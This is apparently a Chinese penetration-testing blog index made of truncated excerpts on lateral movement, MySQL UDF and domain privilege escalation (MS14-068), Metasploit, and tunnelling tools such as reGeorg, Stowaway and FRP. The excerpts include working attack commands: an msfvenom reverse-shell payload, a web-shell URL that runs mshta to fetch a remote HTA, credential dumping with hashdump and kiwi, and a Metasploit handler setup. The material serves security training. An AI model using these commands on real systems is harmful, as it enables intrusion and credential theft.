横向移动简介当攻击者在拿下一台内网主机后，通常会利用当前拿下的机器当作跳板，进一步攻击内网其他主机，扩大攻击影响范围。 横向移动有三个主要阶段： 侦察（主机信息收集、内网网络结构信息收集） 凭据/特权收集（主机密码凭证） 对网络中其他计算机的访问权限 获得权限MSF生成HTA反弹shell 1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=4002 -f hta-psh -o 4002.hta 通过WEB漏洞反弹shell 1http://1xx.xx.xx.95:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=cmd /c mshta http://192.168.58.133:8000/6666.hta 得到MSF会话，获取账号密码及Hash 1hashdump 123getsystemload kiwicreds_all 1web\administrator 1qaz@WSX 登录验证 123c ...

MySQL提权利用场景目标主机开启MySQL远程连接，并且攻击者已经获得MySQL数据库连接的用户名和密码信息，通过UDF手工提权获得操作系统管理员权限。 拥有数据库账号密码，可以远程连接数据 拥有Webshell，可以连接数据库 能够写文件 可以操作数据库 如何获取数据库账号密码? 找数据库配置文件 通过Webshell对数据库进行本地爆破 Hash获取MySQL密码 UDF提权简介 UDF提权 UDF提权指的是利用注入漏洞或其他漏洞获取了数据库操作权限后，通过数据库输出具有提权功能的文件并执行提权操作。 UDF介绍 UDF: User Defined Function (用户自定义函数)，为用户提供了一种高效创建函数的方式攻击者编写调用系统cmd命令（linux下相当于调用shell命令）的udf.dll文件，并将udf.dll导出到指定目录下，攻击者创建一个指向udf.dll的自定义函数func，每次在数据库查询中执行func函数等价于在cmd命令中执行命令。 dll文件存放目录 Windows 2003：C:\windows\目录下MySQL 5.1 版本后： ...

局域网访问打开CMD，导航到当前MySQL的bin路径，因为用的是phpstudy_pro集成环境，如下图 访问MySQL:输入MySQL -u root -p,点击Enter键，即可看到密码输入框： 输入密码，点需Enter键确定，即可看到如下图：表示访问MySQL成功。 首先选择数据库： 1use mysql; 添加局域网访问： 1update user set host = '%' where user = 'root'; 或者 1GRANT ALL PRIVILEGES ON *.* TO 'root'@'10.62.144.186' IDENTIFIED BY 'root'; 将 *.* 上的所有权限授予由“root”标识的根“@”本地主机“; 刷新权限： 1flush privileges; 点击Enter键确定，出现如下图，表示刷新成功 使用Navicat连接Mysql(局域网连接，图片用的是用户hbsx,如果没有该用户可以创建该用户，上面 ...

域提权简介域环境提权，就是从普通域用户权限到域控管理权限 域渗透的主要目标就是拿下域控管理权限，拿下域控制器，进而拿下整个域 MS14-068漏洞简介该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 漏洞原理服务票据是客户端直接发送给服务器，并请求服务资源的。如果服务器没有向域控DC验证PAC的话，那么客户端可以伪造域管的权限来访问服务器。 利用条件 域控没有安装MS14-068的补丁KB3011780 拥有一台域内主机权限 具有普通域用户密码、Hash值以及用户SUID 漏洞利用 利用环境 http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 利用工具 123MS14-068.exe: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068Psexec: h ...

Metasploit提权 生成一个Payload，并创建监听 12345678msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=6666 -f exe -oxx.exe# handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 6666use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST 192.168.1.227set LPORT 6666exploit 运行木马文件，MSF获得meterpreter会话 Meterpreter提权Meterpreter自动提权命令 12getuidgetsystem getsystem是由Metasploit-Framework提供的一个模块，它可以将一个管理帐户（通常为本地Administrator账户）提升为本地SYSTEM帐户 执行成功 ...

权限提升简介权限提升概述Windows 计算机中常见的权限 用户权限（Users） 管理员权限（Administrators） 系统权限 (SYSTEM) 访客权限 (Guest) 权限提升(Privilege Escalation )：攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制，提权至高权限的管理员用户，从而获得对整个系统得控制权。 Windows提权 123user --> administratoradministrator --> systemservices --> system Linux提权 1user --> root 提权分类 本地提权 在一个低权限用户下，通过一些条件（应用程序漏洞、系统漏洞等）提升到系统管理员权限或系统最高权限。 远程提权 攻击者通过漏洞利用程序直接获取远程服务器的权限。 操作系统提权 Windows：MS06-067、MS10-084、MS11-014、MS11-05、MS12-020、MS16-032 等Linux：CVE-2017-7308、CVE-2017- ...

HTTP代理reGeorg https: github.com/NoneNotNull/reGeorg reGeorg 是 reDuh 的升级版，主要功能是把内网服务器端口的数据通过 HTTP/HTTPS 隧道转发到本机，实现基于 HTTP 协议的通信。 reGeorg 支持 ASPX，ASHX，PHP，JSP 等WEB脚本，并特别提供了一个 tomcat5 版本。 1234567891011usage: reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]Socks server for reGeorg HTTP(s) tunnelleroptional arguments: -h, help 显示此帮助信息并退出 -l , listen-on 默认监听地址 -p , listen-port 默认监听端口 -r , read-buff 本地读取缓冲区，每个POST发送的最大数据 -u , url 包含隧道脚本的url -v , verbose 详细输出(INFO|DEBUG) 1python2 reGeor ...

Stowaway简介 https://github.com/ph4ntonn/Stowaway Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具 用户可使用此程序将外部流量通过多个节点代理至内网，突破内网访问限制，构造树状节点网络，并轻松实现管理功能 名词解释 节点: 指 admin || agent 主动模式: 指当前操作的节点主动连接另一个节点 被动模式: 指当前操作的节点监听某个端口，等待另一个节点连接 上游: 指当前操作的节点与其父节点之间的流量 下游: 指当前操作的节点与其所有子节点之间的流量 Stowaway使用说明Stowaway分为两个角色,分别是： admin 渗透测试者使用的主控端 agent 渗透测试者部署的被控端 adminadmin 用法： 12345>> ./stowaway_admin -l <port> -s [secret]>> ./stowaway_admin -c <ip:port> -s [secret]>> ./stowaway_admin -c & ...

渗透场景 测试Target1 信息收集（同代理实战01） 分析利用（同代理实战01） 主机信息收集（同代理实战01） 建立Socks代理 FRP建立Socks代理 模拟VPS启动frps VPS：192.168.0.132 12345# 启动frps./frps -c frps.ini# 查看frps配置文件cat frps.ini 12[common]bind_port = 7000 Target1启动frpc Target1：192.168.0.133 12345# 启动frpc./frpc -c frpc.ini# 查看frpc配置文件cat frpc.ini 1234567[common]server_addr = 192.168.0.132server_port = 7000[socks5]type = tcpplugin = socks5remote_port = 10088 测试Target2 信息收集（同代理实战01） 分析利用（同代理实战01） 配置Socks代理连接Webshell（同代理实战01） 主机信息收集（同代理实战01） FRP ...